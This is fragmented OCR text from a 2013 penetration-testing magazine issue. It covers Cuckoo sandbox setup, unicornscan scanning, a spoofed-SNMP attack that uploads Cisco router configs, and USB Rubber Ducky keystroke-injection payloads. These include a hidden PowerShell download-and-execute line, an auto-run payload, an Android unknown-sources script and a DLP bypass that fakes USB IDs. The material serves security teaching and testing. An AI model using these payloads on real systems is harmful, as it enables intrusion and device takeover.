Malware, short for malicious (or malevolent) software, is software used or created by attackers to
disrupt computer operation, gather sensitive information, or gain access to private computer systems. It can appear in the form of code, scripts,
active content, and other software. Malware is
a general term used to refer to a variety of forms
of hostile or intrusive software. Malware includes
computer viruses, ransom-ware, worms, trojan
horses, root-kits, key-loggers, dialers, spyware,
adware, malicious (browser helper objects) BHOs
and other malicious programs; the majority of active malware threats are usually worms or trojans
rather than viruses [2].
No longer are computers, or servers only at
risk of being infected, with the popularity of mobile computing, enterprises are quickly adopting
BYOD strategies to support personal devices
within the corporate environment. The conveniences of portable browsers will likely lead to
05/2013 (24) August
Behavioral Analysis
Code Analysis
Code analysis involves disassembling and reverse engineering the code of the malware. This
Page 44
http://pentestmag.com
being used. Isolating your malware lab from other computers in the network is often not enough.
Typically, you should isolate them from the Internet
as well.
Once your lab is setup with at least one guest operating system, you will need to download Cuckoo [11], the malware sandbox that allows for automating behavior analysis of malicious samples.
Cuckoo Sandbox is an application that provides a
virtual sandbox for the automatic analysis of malware specimens. Originally developed by Claudio Guarnieri for the Google Summer of Code, the
project became so popular it is now a mainstay of
the Honeynet Project, a leading international research institution with a special focus on malware.
The platform allows for the automatic capture and
advanced analysis of dangerous strains of malware in a contained environment [17].
Since Cuckoo is based on Python you will need
to ensure its installed on our system and any additional dependencies needed.
At a high level there are other optional dependencies that are mostly used by modules and utilities. The following libraries are not strictly required,
but their installation is recommended [18]:
Dpkt (Highly Recommended): for extracting relevant information from PCAP files.
Jinja2 (Highly Recommended): for rendering
the HTML reports and the web interface.
Page 45
http://pentestmag.com
TOOLS
Magic (Optional): for identifying files formats
(otherwise use file command line utility)
Pydeep (Optional): for calculating ssdeep fuzzy
hash of files.
Pymongo (Optional): for storing the results in a
MongoDB database.
Yara and Yara Python (Optional): for matching
Yara signatures (use the svn version).
Libvirt (Optional): for using the KVM machine
manager.
Bottlepy (Optional): for using the web.py and
api.py utilities.
Pefile (Optional): used for static analysis of
PE32 binaries.
Before downloading Cuckoo lets make sure we
have all the necessary dependencies and modules
installed, begin by installing Python (see Listing 1).
ssdeep is a program for computing context triggered piecewise hashes (CTPH), also called fuzzy
hashes. You will need to install ssdeep checksums
and related python modules to support this function (see Listing 2).
TcpDump is necessary for creating packet captures of network activity for analysis on the guest
operating system when malware is submitted; this
is an important step to ensure your sniffer is properly configured (see Listing 3).
A virtualization platform is required; this is where
you will be submitting your malware samples. The
command below will install VirtualBox from the repository, if you decide you can navigate to the website https://www.virtualbox.org/wiki/downloads and
manually download and install your platform package (see Listing 4).
Cuckoo sandbox is hosted on Github, if you dont
have git installed below are the commands to achieve
this and clone cuckoo (see Listing 5, Figure 1).
At this point you should have all the necessary
software and recommended dependencies installed, you can begin creating your guest virtual
image using Windows7 or WindowsXP.
Page 46
http://pentestmag.com
Figure 2. agent.py
Figure 3. Virtualbox.conf
Figure 4. Cuckoo.conf
The virtualbox.conf file contains all the configurations for your virtual environment. You will need to
Page 47
http://pentestmag.com
TOOLS
change the machine name, ip address, and label
to match what you have in your environment (see
Figure 3).
Contained within the cuckoo.conf file is a reporting
server value, make this this matches the ip address
of your host machine. If your unsure of this value
you can set it to 127.0.0.1 as pictured in Figure 4.
At this point we are ready to launch cuckoo and
submit malware samples. To launch the application
type ./cuckoo.py.
This will start the application and indicate if its
ready for malware specimens. If you receive any
errors on the screen you will need to have these
corrected (see Figure 5).
References
Page 48
http://pentestmag.com
/opt/cuckoo/utils/submit.py /path-to-malware/
malware_sample
Conclusion
Christopher Ashby
Christopher Ashby, Principle IT Security Analyst at GLOBALFOUNDRIES, has more than 15 years of proven experience participating in a broad range of corporate initiatives including architecting, engineering, and operating
information-security solutions in direct support of business objectives. In his most current role he serves alongside a team of engineers responsible for the security of
a large global organization. For specific information on
the author or to contact him please visit his LinkedIn
profile (http://www.linkedin.com/in/ashbyca).
05/2013 (24) August
TOOLS
irst and critical phase of testing is reconnaissance where we usually relay on nmap
which is the most famous and the best tool
(or one of the best ones). Recently, I have started to use unicorn to complete my reconnaissance
phase and I have finded several very useful options of this tool, and these options will be explained in this article.
-R
repeating packets what is a very useful option to get more reliable results and in situations where you test unreliable networks;
192.168.1.110:53 meaning that scan port 53 syntax could be 192.168.1.110:21,22,53, what
means that ports 21,22,53 will be scanned;
192.168.1.110:a scanning all ports 1-65535.
-P port 80 activating
-w writing responses
pcap filters;
in .pcap format file; very
useful for writing reports.
Page 50
http://pentestmag.com
Page 51
http://pentestmag.com
TOOLS
TCP open 192.168.1.128:22 ttl 64
TCP open 192.168.1.110:80 ttl 64
TCP open 192.168.1.128:80 ttl 64
TCP open 192.168.1.128:3306 ttl 64
TCP open 192.168.1.128:443 ttl 64
TCP open 192.168.1.110:631 ttl 64
sender statistics 127.4 pps with 86528 packets sent total
listener statistics 671 packets recieved 0 packets droped and 0 interface drops
TCP open
ftp[
21]
from 192.168.1.110 ttl 64
TCP open
http[
80]
from 192.168.1.110 ttl 64
TCP open
ipp[ 631]
from 192.168.1.110 ttl 64
TCP open
ftp[
21]
from 192.168.1.128 ttl 64
TCP open
ssh[
22]
from 192.168.1.128 ttl 64
TCP open
http[
80]
from 192.168.1.128 ttl 64
TCP open
https[ 443]
from 192.168.1.128 ttl 64
TCP open
mysql[ 3306]
from 192.168.1.128 ttl 64
root@bt:~ #
unicornscan -H -msf -Iv -P port 80 -w http.pcap 192.168.1.110
using interface(s) vmnet0
scaning 1.00e+00 total hosts with 3.38e+02 total packets, should take a little longer than 8 Seconds
opening `http.pcap for pcap log
connected 192.168.1.1:14145 -> 192.168.1.110:80
TCP open 192.168.1.110:80 ttl 64
sender statistics 272.2 pps with 338 packets sent total
listener statistics 5 packets recieved 0 packets droped and 0 interface drops
TCP open
http[
80]
from 192.168.1.110 ttl 64
-s 10.23.23.23 192.168.1.110
Page 52
http://pentestmag.com
0000 DF
IP DST
0
0000 DF
Aleksandar Bratic
Aleksandar Bratic (CISSP), works as CISO at financial institution in Serbia, has interests in penetration testing, methodologies, techniques, risk mitigations methods and countermeasures.
TOOLS
Setup
able to create files on the fly as configs are collected. Edit /etc/default/tftpd-hpa and make the
TFTP_OPTIONS have the -c.
TFTP_OPTIONS=-c secure
Page 54
http://pentestmag.com
The router will use its routing table to make the tftp
request and that outgoing interface can be different than what you have targeted.
The OID we want is 1.3.6.1.4.1.9.2.1.53.+tf
tpserver_ip and you will need to set a variable to
be the filename of the config. With the write variable in hand, we can use snmpset and hopefully
upload the new.cfg file easily.
root@bt:/# snmpset -v 1 -c abc123 192.168.100.254
1.3.6.1.4.1.9.2.1.53.192.168.101.108 s new.cfg
-c abc123 is the write community.
192.168.101.108 is the tftp server
config.
Putting a Config
hosting the
If all is well you should see a config being uploaded. The Cisco ios commands contained in the file
new.cfg will have been uploaded and merged right
into the running config. The ios commands could
have been any valid ios command available, from
reseting the enable password to modifying an ACL.
Page 55
http://pentestmag.com
TOOLS
ing the source address nearly impossible given we
cannot control the routing back to the spoofed address. In spoofing traffic, everything must be contained in one single packet. Of the UDP protocols,
SNMP has the most possibility. It has command
and control uses. In v1, it uses unencrypted passwords and it is still widely deployed.
From the diagram of the packet and the hosts
(Figure 1), you can see that a forged SNMP packet is sent to the victim router, who will respond to
the forged packet by sending a response to the
spoofed host. Here the spoofed host is quite surprised to get a response to a packet that it never sent. This unexpected response is sometimes
logged, but other times may get discarded depending on the setup.
Can I spoof traffic from my Internet connection?
The answer is maybe. About 30% of Internet
connections have ISPs that do not properly filter
source addresses. There are a number of tools
and tricks to check if you can spoof an address.
However, before you try to experiment, you almost
certainly need to directly connect to the Internet
without a firewall/NAT router. Any kind of natting
will rewrite your source addresses by definition
and any modern firewall will check the reverse
path and will drop your packets. If your ISP correctly filters spoofed addresses, you are out of luck
and will need to try another connection.
Page 56
http://pentestmag.com
Page 57
http://pentestmag.com
TOOLS
You need to construct a file that contains a list of
hosts to spoof. When spoofing large netblocks, use
host IP addresses at the beginning and end of the
netblocks. Also try and randomize some of the addresses, you never know we all get lucky sometimes when guessing. You will also need a large
dictionary to test against. Be aware here that your
search space will be (number of hosts * dictionary)
so 100 hosts with a dictionary of a 100 words becomes a search space of 10,000 combinations.
The current tool can brute force 280 packets a second, so plan ahead before you attempt to extremely
large dictionaries and enumerated netblocks. Next,
you need to make sure hping2 is installed on your
machine. This is the tool we are going to use to stuff
raw spoofed packets onto the network. You will also
need od, sed, xxd, bash these are almost always
installed somewhere on any modern Unix system.
differences in password length. Since an attacker needs to modify the tftp server IP address, this
needs to change as well. All the variables in the
packet are wrapped by header and length values.
This means to construct a SNMP set packet I had
to write and recalculate all parts of the packet in the
script. Listing 3 shows the script written in bash.
In the script, we are at the main loop of the program. From here the operations are trivial. We first
router#
router# copy startup running
router#clear log
router#y
Page 58
http://pentestmag.com
http://www.surf.vi/down/example.cfg
http://www.surf.vi/down/ciscospoofer.sh
Detection
Download links
This isnt a perfect story though, syslog/tacacs/rancid are all going to leave traces here of what you
did. The router when it receives a snmpset config
upload, it sends a message to syslog about the config uploading. This is really a bad thing to see in your
syslogs, you should expect most admins to take action upon seeing an upload from a foreign address.
Jason Nehrboss
Page 59
http://pentestmag.com
TOOLS
he project was to process the popular Teensy HID Attacks. But there were two small
problems with regards to the Teensy: programming and size. Some knowledge of C/C++
was needed to effectively program the device, and
with the addition of the micro sdcard reader the resultant hardware was rather bulky and ugly.
The solution was to create a custom/bespoke
board that used a similar chipset that had the micro sdcard reader built-in. The aim was to fit everything into a standard USB case, making the
Ducky a sleak little ninja. Thus, the Ducky became
a smaller, lighter, and yet more powerful adversary.
Initially, the Ducky was limited to supporting only
the Microsoft Windows OS and the US language/
keyboard mapping. Suspicions were that this was a
firmware related problem. But thanks to the developments of one community member, midnitesnake,
the community has seen an influx of different language support (US, GB, FR, DE, NW, SW, RU, ES,
PT, BR, BE) and a number of device firmware; Keyboard, Mass Storage, and Composite Device (Keyboard & Mass Storage). The rise of the Ducky has
seen the return of Auto-Run style attacks, as the injected keyboard payload can execute a file on the
mass storage partition or even on another device.
No longer limited to the Microsoft Windows platform, midnitesnake has hacked the firmware so
05/2013 (24) August
that it can function on other OSs. The full list includes now:
Windows;
Mac OSX;
Linux;
BSD;
Solaris;
Other Unix based OSs;
Android;
iOS.
Hardware
Page 60
http://pentestmag.com
them into HID control characters. The state machine manages the state of the keys (button down/
button up) so the user does not have to worry
about the complexity of the HID protocol, and the
fact that every emulated keypress has to be dealt
with twice key down and key up. The Duckys
board may vary in color (depending on production
runs), but essentially all current Duckies are Revision 2 (R2). An updated Revision 3 that should
contain yet another more powerful chip, with more
memory, possibly opening other attack possibilities, is currently in the concept phase.
Encoder
One key factor was to make a high-level scripting language that would be easy for the public to
learn, in order to quickly develop interesting and
effective payloads. The Hak5 Team constructed
the first Ducky-Code or rather Ducky Script. This
took plain simply English commands and keyboard
identifiers and translating them into a series of twobyte codes. One-byte for modifiers, such as shift,
caps_lock, and others, and one-byte for the actual
key press a, b, c The Team wanted to create an
opensource sub-program the Encoder that would
address the need of converting the high level commands into these two-byte codes. The program
had to function on any OS and for this reason Java
was used to compile a program that would translate English instructions to the raw binary code
(inject.bin) that the Ducky needed. The Encoder that comes delivered with the Ducky is Jason
Applebaums original version, which unfortunately
works only on US languages. But read on
When midnitesnake built the community firmware he decided to keep the current Encoder and
the state machine (covered below), so that all code
was backward compatible. He discovered that the
initial language problems were in-fact located in
the Encoder.jar and not in the firmware. Using a
USB sniffer, midnitesnake was able to determine
the HID codes for additional keys, and secret behind multiple key presses (representing three keystrokes within two bytes) and the fact that HID
codes would represent different characters on the
keyboard depending on the selected language of
the OS, effectively opening up the power of the
Ducky to the whole world!
This second version of the encoder was published as open-source on a googlecode website
(http://ducky-decode.googlecode.com),
initially,
only supporting US and GB keyboard mappings.
Midnitesnake turned to the community to help fill-in
05/2013 (24) August
Community Firmware
The stock firmware is a basic keyboard HID injection attack. This essentially means that the Ducky
is behaving as an automatic keyboard typing
much faster than any human. The Duckys speed
is limited to the USB bus and the clock speed of
the micro-controller. Still it can type in seconds
what would take the average human minutes.
Page 61
http://pentestmag.com
TOOLS
The Ducky can quickly type on a machine that
has briefly been left unlocked, or it can be used
in brute-force attacks to compromise a login form
or authorization request. In-fact the Ducky can be
used in any situation where a keyboard is normally
used, even to aid in repetitive tasks. We will now
look at a simple Ducky payload to demonstrate the
simple nature of Ducky Script and how simple the
Ducky is to program.
Creating an inject.bin
Copy the Sample Payload from Listing 1 and insert the text into any text editor (Notepad, Nano,
Vi) and save to a file called sample.txt.
To run the encoder, you need to check if Java is
installed on your machine. Open a command-line
terminal with cmd.exe, and type java version, if
you receive command not found it is possible that
Java is not installed on your system. Visit http://
java.com/en/download/index.jsp to download Java
for your system.
Now to convert the sample.txt into an inject.bin,
copy the command from Listing 2.
Alternatively, if you are not using an American
configuration / language, you can switch languages be using the l flag (see Listing 3).
Then simply copy the inject.bin over to the sdcard (using a suitable adapter).
Remove the sdcard, and insert into the Duckys
sdcard reader. Plug the Ducky into a Windows
Computer. And watch the payload open notepad
and write your test message.
If you want some ideas on creating some Ducky
Script payloads, the community is maintaining a
small list on the Hak5 github repository https://
github.com/hak5darren/USB-Rubber-Ducky/wiki/
Payloads. Also if you are more interested in attack
vector payloads visit https://code.google.com/p/
simple-ducky-payload-generator/ for a collection of
remote shells and social engineering type payloads.
DELAY 3000
WIN R
DELAY 100
STRING NOTEPAD
ENTER
STRING This is a Test. My First Ducky Payload!
ENTER
Page 62
DELAY 3000
WIN R
DELAY 100
STRING powershell -windowstyle hidden
(new-object System.Net.WebClient).
DownloadFile(http://example.com/exploit.
txt,%TEMP%\exploit.exe); Start-Process
%TEMP%\exploit.exe
ENTER
http://pentestmag.com
access to the local network! Someone has inserted one of Bobs Duckies into their computer.
DLP Attacks
Shortly after discovering the answer to building different key-mappings without the need to alter the
firmware, midnitesnake released a firmware that
allowed the Ducky to function as a normal USB
Mass Storage device. This was functional but
slow; as the Ducky is Open-Source the Manufacturer (Hak5) nor midnitesnake (community leader)
could use the proprietary SDIO code that allows
fast file transfers. Hence, the Ducky is limited to the
maximum speed of the MMC data transfer rate of
approximately 150KB/s. This firmware release was
the initial stepping stone, for the progression of the
Composite Duck, nick-named The Twin Duck.
However, there is an important part the Ducky can
play. The firmware has been given the functionality
to mimic a specific USB VID and PID from within
a file stored on the micro-sdcard called vidpid.bin.
This file is read by the microcontroller as power is
initially supplied to the device, and the values contained within this file are used to manipulate the data on the Duckys USB stack. When the OS starts
to interrogate the device for the VID, PID, and class
identifiers, this information is then supplied to the
OS so the appropriate driver can be loaded. Any
device control software (DLP solutions), which operates on white/black-lists, can therefore be easily
bypassed as the Ducky can pretend to be an authorised device. For example, if an organisation only allowed encrypted Kingston Data Traveller USB
Drives, the Ducky would pretend to by a Kingston
Data Traveller. The OS would correctly mount the
drive; and the user is free to copy data to/from the
device. This has been successfully demonstrated
within the industry with organistions restricting the
use of USB Disk Drives to a particular vendor that
supplies encrypted drives. The Ducky is able to pretend to be an encrypted drive and can successfully
be mounted. The file vidpid.bin can be easily be altered by any hex editor software (Windows: HXD
http://mh-nexus.de/en/hxd/, Linux: xxd, hexedit).
The VID and PID are read as Hexadecimal values
and not ASCII. For example to mimic the USB VID
PID of a Kingston Data Traveller set the first four
bytes of the vidpid.bin file to:
09 51 16 00
Then, you need to save the file, unplug, and reinsert the Ducky. You should then find that the
05/2013 (24) August
TOOLS
OS will now identify the Ducky as a Kingston Data Traveler Drive. Since this development, Anti-Virus (AV) companies and other DLP vendors
have jumped onto the Ducky project in order to
research viable counter-measures. Currently, the
vendors have come up with the following solutions to stop Ducky DLP attacks:
Additionally using the USB serial number to
verify the device. Current Ducky firmware deListing 5. Windows Example Auto-run Attack Code in
Ducky Script
DELAY 3000
WIN R
DELAY 50
STRING CMD.EXE
ENTER
DELAY 100
STRING for /f %d in (wmic volume get driveletter^, label ^| findstr DUCKY) do set
myd=%d
ENTER
DELAY 50
STRING %myd%\payload.exe
ENTER
STRING EXIT
ENTER
The Ducky has numerous alternative firmware created by midnitesnake; the composite device (or
c_duck_vXX.hex) is a combination of the Keyboard HID Emulation and the Mass Storage device. Now, the HID payload can directly reference
the Drive/Partition of the sdcard mounted on the
actual Ducky. This essentially brings back auto-run
type attacks as no interaction is needed from the
user. The Ducky can type so fast that a small and
simple payload is triggered within a flash!
The code shown in Listing 5 utilizes the power of the Windows Management Instrumentation
Command-line (WMIC) to find the drive letter associated with the label DUCKY, then sets an environment variable to reference the drive. Then, the
payload on the sdcard is executed through the use
of the environment variable. No interaction is required from the user, other than possibly inserting
the Ducky (in disguise as a normal USB Drive) into
their computer. WMIC I only present in Windows,
therefore the payload needs adapting for OSX or
Linux systems (see Listings 6, 7).
Note: Timings may need to be adjusted depending on the speed of the system
Hak5s Darren Kitchen was the first to test out midnitesnakes new firmware and found the Ducky
would also function on the Android Platform. Darren successfully tested the firmware on the Galaxy Nexus/Note running the Android version 4.2.1.
Darren programmed a script that would utilize the
power of the Ducky to unlock his phone within 24
hours. For this attack to work you will need a compatible USB (micro) On-The-Go (OTG) cable.
With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you are looking at
a best case scenario of exhausting the key space
in about 16.6 hours. Thankfully the USB Rubber
Ducky never gets tired, bored or has to pee.
Page 64
http://pentestmag.com
iOS
Fuzzy Duck
Page 65
http://pentestmag.com
TOOLS
attacking systems, applications, or end users, the
Ducky can also be used as a tool to aid or even
complement security. Just check out some of the
scenarios below.
Listing 10. Android Payload Allow Program
Installation from Unknown Sources
CTRL P
REM SELECT SECURITY
REM TOTAL 13 DOWNARROWS
DOWNARROW
REPEAT 12
REM SELECT UNKNOWN SOURCES
RIGHTARROW
ENTER
REM SAY OK TO THE POPUP MESSAGE
RIGHTARROW
ENTER
Passwords
On The Web
Glossary
AV: Anti-Virus;
DLP: Data Loss Prevention;
EP: End-Point;
HID: Human Interface Device;
KB: Kilo-Byte (1024 Bytes);
MSC: Mass Storage Class;
OS: Operating System;
OTG: On-The-Go;
PID: Product Identifier;
PIN: Personal Identification Number;
PoC: Proof of Concept;
UDC: USB Device Controller;
UDI: USB Device Interface;
USB: Universal Serial Bus;
VID: Vendor Identifier;
WMIC: Windows Management Instrumentation
Command-line.
MIDNITESNAKE
Page 66
http://pentestmag.com
U P D AT E
NOW WITH
STIG
AUDITING
IN SOME CASES
nipper studio
HAS VIRTUALLY
REMOVED
the
NEED FOR a
MANUAL AUDIT
CISCO SYSTEMS INC.
Titanias award winning Nipper Studio configuration
auditing tool is helping security consultants and enduser organizations worldwide improve their network
security. Its reports are more detailed than those typically
produced by scanners, enabling you to maintain a higher
level of vulnerability analysis in the intervals between
penetration tests.
Now used in over 45 countries, Nipper Studio provides a
thorough, fast & cost effective way to securely audit over
100 different types of network device. The NSA, FBI, DoD
& U.S. Treasury already use it, so why not try it for free at
www.titania.com
www.titania.com
4 Ensure resilience
4 Mitigate risk